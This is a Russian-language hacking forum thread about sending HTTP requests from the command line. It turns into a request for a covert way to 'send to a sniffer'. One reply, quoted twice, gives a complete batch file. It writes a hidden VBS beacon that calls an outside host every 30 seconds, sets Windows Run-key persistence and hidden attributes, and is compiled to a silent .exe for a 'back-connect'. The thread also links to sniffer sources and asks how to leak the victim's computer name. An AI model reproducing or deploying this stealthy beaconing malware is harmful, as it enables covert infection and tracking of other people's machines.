Друзья,

можно ли через консоль организоваь пост гет запрос?

т.е. открыть браузер и перейти на сайт, это одно, но нужен запрос только в окне кансоли, как например брут хттп в Hydra.

Кто падскажет иле хотя бы натолкнет на мыслю?

можно через netcat:
cat request.txt | netcat site.com 80 > response.txt
при этом request.txt содержит полностью GET или POST запрос

спасибо большое. хорошо.

альтернативы есть? ( не то штобы метод не подхадил, просто хачу паглубжэ прознать вопрос)


при этом request.txt содержит полностью GET или POST запрос

request.txt может храниться на хосте? либо только на машине на которой выполняетца гет\пост?

Так же интересует как будет выглядеть посыл на сниффер в request.txt ?

Прям так туда и записать ?

GET http://host.com/public/s.gif HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2) Gecko/20100115 Firefox/3.6 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Как беспалевнее послать на сниффер через .bat ?

И возможно ли это вообще ?

Как беспалевнее послать на сниффер через .bat ?

в приципе между строк вапросов сабжа имено это я и хотел передать) + поправочка - беспалева

Изящное решение для такого посыла на сниффер делаем такой батник:

MD %SystemRoot%\123123
echo >%SystemRoot%\123123\123.vbs
echo Set oHTTP = WScript.CreateObject("winhttp.winhttprequest.5.1") >%SystemRoot%\123123\123.vbs
echo iPeriod = 30 >>%SystemRoot%\123123\123.vbs
echo sSource = "http://host.com/public/s.gif" >>%SystemRoot%\123123\123.vbs
echo iTimer = Timer >>%SystemRoot%\123123\123.vbs
echo While 1 >>%SystemRoot%\123123\123.vbs
echo WScript.Sleep 1000 >>%SystemRoot%\123123\123.vbs
echo If (Timer - iTimer) * 3 Then >>%SystemRoot%\123123\123.vbs
echo oHTTP.open "GET", sSource, False >>%SystemRoot%\123123\123.vbs
echo on error resume next >>%SystemRoot%\123123\123.vbs
echo oHTTP.send >>%SystemRoot%\123123\123.vbs
echo iTimer = Timer >>%SystemRoot%\123123\123.vbs
echo End If >>%SystemRoot%\123123\123.vbs
echo WEnd >>%SystemRoot%\123123\123.vbs
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run" /v 123 /t REG_SZ /d %SystemRoot%\123123\123.vbs /f
start "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\123" %SystemRoot%\123123\123.vbs
attrib /d %systemdrive%\Docume~1\123 +h +s

Это добро пропускается через QBFC в ghost режиме и делается .exe - получаем что то вроде "бек-коннекта" на сниффер. :)

Учтите что лог сниффера будет постоянно засран.

echo iPeriod = 30 >>%SystemRoot%\123123\123.vbs - Кол-во секунд до следующего захода на сниффер целью, в данном случае оно равно 30 секундам.

Для тестирования вот вам сорсы сниффера - http://kanick.ru/sniffer/public.rar

Лечится так:

1. Пуск>выполнить>msconfig>автозагрузка>убрать галку с 123
2. Удалить фаил С:/windows/123123/123.vbs
3. Убить процесс wscript.exe

Радуемся и пляшем. :cool:

Фаер крутой, вапрос закрыт

А можно ли просто из cmd отправить гет\пост запрос такого типа
http://site.ru/undex.php?name=%COMPUTERNAME%
без использования vb скрипта?

Изящное решение для такого посыла на сниффер делаем такой батник:

MD %SystemRoot%\123123
echo >%SystemRoot%\123123\123.vbs
echo Set oHTTP = WScript.CreateObject("winhttp.winhttprequest.5.1") >%SystemRoot%\123123\123.vbs
echo iPeriod = 30 >>%SystemRoot%\123123\123.vbs
echo sSource = "http://host.com/public/s.gif" >>%SystemRoot%\123123\123.vbs
echo iTimer = Timer >>%SystemRoot%\123123\123.vbs
echo While 1 >>%SystemRoot%\123123\123.vbs
echo WScript.Sleep 1000 >>%SystemRoot%\123123\123.vbs
echo If (Timer - iTimer) * 3 Then >>%SystemRoot%\123123\123.vbs
echo oHTTP.open "GET", sSource, False >>%SystemRoot%\123123\123.vbs
echo on error resume next >>%SystemRoot%\123123\123.vbs
echo oHTTP.send >>%SystemRoot%\123123\123.vbs
echo iTimer = Timer >>%SystemRoot%\123123\123.vbs
echo End If >>%SystemRoot%\123123\123.vbs
echo WEnd >>%SystemRoot%\123123\123.vbs
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run" /v 123 /t REG_SZ /d %SystemRoot%\123123\123.vbs /f
start "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\123" %SystemRoot%\123123\123.vbs
attrib /d %systemdrive%\Docume~1\123 +h +s

Это добро пропускается через QBFC в ghost режиме и делается .exe - получаем что то вроде "бек-коннекта" на сниффер. :)

Учтите что лог сниффера будет постоянно засран.

echo iPeriod = 30 >>%SystemRoot%\123123\123.vbs - Кол-во секунд до следующего захода на сниффер целью, в данном случае оно равно 30 секундам.

Для тестирования вот вам сорсы сниффера - http://kanick.ru/sniffer/public.rar

Лечится так:

1. Пуск>выполнить>msconfig>автозагрузка>убрать галку с 123
2. Удалить фаил С:/windows/123123/123.vbs
3. Убить процесс wscript.exe

Радуемся и пляшем. :cool:
Это круто ! :) уже правдо где то было на ачате :)

А можно ли просто из cmd отправить гет\пост запрос такого типа
http://site.ru/undex.php?name=%COMPUTERNAME%
без использования vb скрипта?

фантазируй :)

Через telnet еще можно. Что то типа:
telnet google.com 80
%хттп запрос%
подробней (http://tonycode.com/wiki/index.php?title=Making_HTTP_requests_via_telnet)